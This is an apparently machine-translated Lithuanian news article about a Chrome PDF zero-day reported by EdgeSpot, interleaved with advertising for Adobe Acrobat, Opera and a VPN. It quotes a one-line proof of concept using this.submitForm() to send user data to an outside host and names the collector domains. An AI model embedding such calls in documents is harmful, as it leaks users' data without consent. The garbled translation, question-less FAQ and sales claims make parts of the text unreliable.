- „EdgeSpot“ aptiko intriguojantį „nulinės dienos“ pažeidžiamumą, naudojant „Chrome“ PDF dokumentus.
- Tai pažeidžiamumas gali jums pakenkti rinkdami neskelbtinus duomenis savo kompiuteryje.
- Naršykite mūsų Žiniatinklio ir debesies puslapis daugiau įžvalgų apie kitas priemones ir paslaugas.
- Jei jus domina naršyklės, mes pateikiame daug informacijos apie jas mūsų Naršyklių centras.
Padarykite visus dokumentus prieinamus ir saugius naudodami „Adobe Acrobat Reader“. Šis dokumentų valdymo įrankis taip pat leis jums pasirašyti el. Paštu ir sukurti oficialias formas, kad sutaupytumėte laiko darbe. Įsigykite jį savo asmeniniam kompiuteriui ir galėsite:
- Atidarykite, atspausdinkite ir redaguokite visus savo PDF ir kitus failų tipus
- Paprasčiau užpildykite PDF formas
- Svarbiausi dokumentai turi būti užšifruoti
Gaukite visas programas už ypatingą kainą!
Pasaulinė dokumentų valdymo programinė įranga Nr.1 dabar yra už puikią kainą, todėl paskubėkite!
Išnaudojimo aptikimo tarnyba „EdgeSpot“ atrado intrigą „Chrome“ nulinės dienos pažeidžiamumas naudojant PDF dokumentus.
Pažeidžiamumas leidžia užpuolikams rinkti neskelbtinus duomenis naudojant kenkėjiškus PDF dokumentus, atidarytus „Chrome“.
Kai tik auka atidaro atitinkamus PDF failus „Google Chrome“, kenkėjiška programa pradeda veikti fone, rinkdama vartotojo duomenis.
Tada duomenys persiunčiami į nuotolinį serverį, kurį kontroliuoja įsilaužėliai. Jums gali būti įdomu, kokius duomenis puola užpuolikai, jie jūsų kompiuteryje nukreipia į šiuos duomenis:
- IP adresas
- Visas sistemos PDF failo kelias
- OS ir „Chrome“ versijos
Saugokitės kenkėjiškų programų nuskaitytų PDF failų
Ekspertai dėmėtas kad viena iš dviejų sričių perskaitykite pranešimą [.] kom arba burpcollaborator [.] net gaudavo duomenis.
Jie atskleidė, kad užpuolikai naudojasi this.submitForm () PDF „Javascript“ API rinkti neskelbtiną vartotojų informaciją.
Mes išbandėme jį su minimaliu „PoC“, paprastu API iškvietimu this.submitForm (’ http://google.com/test’) privers „Google Chrome“ siųsti asmeninius duomenis į google.com.
Šią „Chrome“ klaidą naudojo du skirtingi kenkėjiškų PDF rinkinių rinkiniai, kurie abu buvo išplatinti atitinkamai 2017 m. Spalio mėn. Ir 2018 m. Rugsėjo mėn.
Pažymėtina, kad surinktus duomenis užpuolikai gali panaudoti patobulinti atakas ateityje. Ataskaitos rodo, kad pirmoji failų partija buvo sudaryta naudojant „ReadNotify“ PDF stebėjimo paslaugą.
Vartotojai gali naudotis paslauga norėdami sekti vartotojų peržiūras. „EdgeSpot“ nepateikė jokios informacijos apie antrojo rinkmenos PDF failų pobūdį.
Trumpas patarimas: pakeiskite naršyklę į „Opera“
Šiais neramiais laikais kiekviename žingsnyje esame užpulti kenkėjiškų programų, sukčiavimo ir trojos arklys, todėl turime būti daug budresni ir saugoti.
Kadangi tai yra specifinė „Chrome“ problema, galite išvengti tokios grėsmės ir visų kitų naudodami į saugumą orientuotą naršyklę, panašią į Opera.
Šioje naršyklėje yra įmontuotas skelbimų blokatorius, kuris ne tik pašalina tokius trukdžius, bet ir blokuoja analizės scenarijus, stebėjimo taškus ir duomenų rinkimo metodus.
Ir jei norite būti visiškai tikri, kad laikotės nuo bet kokio pavojaus, užeikite už įmontuoto VPT paslauga, kuria galima nemokamai naudotis neribotą laiką.
Opera
„Opera“ siūlo puikią apsaugą nuo grėsmių naudodama integruotą skelbimų blokavimą ir VPN paslaugą nemokamai!
Apsilankykite svetainėje
Kaip apsaugoti nuo PDF pažeidžiamumo?
Atsisiųskite „Adobe Acrobat PRO“
„Adobe“ ir „Chrome“ puikiai dera tvarkant PDF failus. Įdiegę „Adobe“ plėtinį, skirtą „Chrome“, galite peržiūrėti ir tvarkyti PDF failus pagal savo skonį nepalikdami mėgstamos naršyklės.
Nepaisant tvirtos struktūros, PDF failuose paslėptos kenkėjiškos programos gali neaptikti, jei naudojate standartinę „Reader“ versiją.
Profesionali versija rekomenduojama garantuoti jūsų apsaugą ir apsaugoti jūsų duomenis nuo įsilaužėlių.
Nors tai nėra nemokama, kaina, kurią mokėsite, yra gana maža už daugybę papildomų funkcijų, kurios jums patiks, įskaitant sustiprintą jūsų PDF failų saugumą.
Taip pat yra 7 dienų nemokamas bandymas, kad prieš įsigydami galėtumėte paragauti visos „Pro“ patirties.
„Adobe Acrobat PRO“
Atsisiųskite „Adobe Acrobat PRO“, laikykitės kenkėjiškų programų. Ji turi daug daugiau funkcijų nei nemokama versija ir saugo jūsų duomenis.
Apsilankykite svetainėje
Jei norite būti saugūs naršydami internete, turėsite gauti visiškai pritaikytą įrankį, kad apsaugotumėte savo tinklą. Įdiekite privačią interneto prieigą dabar ir apsisaugok. Tai apsaugo jūsų kompiuterį nuo atakų naršant, užmaskuoja jūsų IP adresą ir blokuoja nepageidaujamą prieigą.
„Exploit“ aptikimo tarnyba „EdgeSpot“ norėjo įspėti „Chrome“ vartotojus apie galimą riziką, nes tikėtasi, kad pleistras nebus išleistas artimiausiu metu.
„EdgeSpot“ praėjusiais metais pranešė „Google“ apie pažeidžiamumą ir bendrovė pažadėjo išleisti pleistrą balandžio pabaigoje.
Tačiau galite apsvarstyti galimybę laikinai išspręsti problemą, vietoje peržiūrėdami gautus PDF dokumentus naudodami kitą skaitytojo programą.
Arba taip pat galite atidaryti PDF dokumentus „Chrome“ atjungdami sistemas nuo interneto.
Dažnai užduodami klausimai
Taip, taip. Bet jei norite platesnio pasirinkimo, ištirkite mūsų populiariausius „Chrome“privatumas plėtiniai šį išsamų vadovą.
Tčia yra daugybė plėtinių, kurie leidžia PDF apdorojimas. Patikrinti iš mūsų puikus vadovas apie geriausius „Chrome“ skirtus PDF plėtinius.
Tai nėra, bet jūs galite greitai jį suaktyvinti. Čia mūsų išsamus vadovas apie tai, kaip įgalinti QR kodo generatorių „Chrome“.
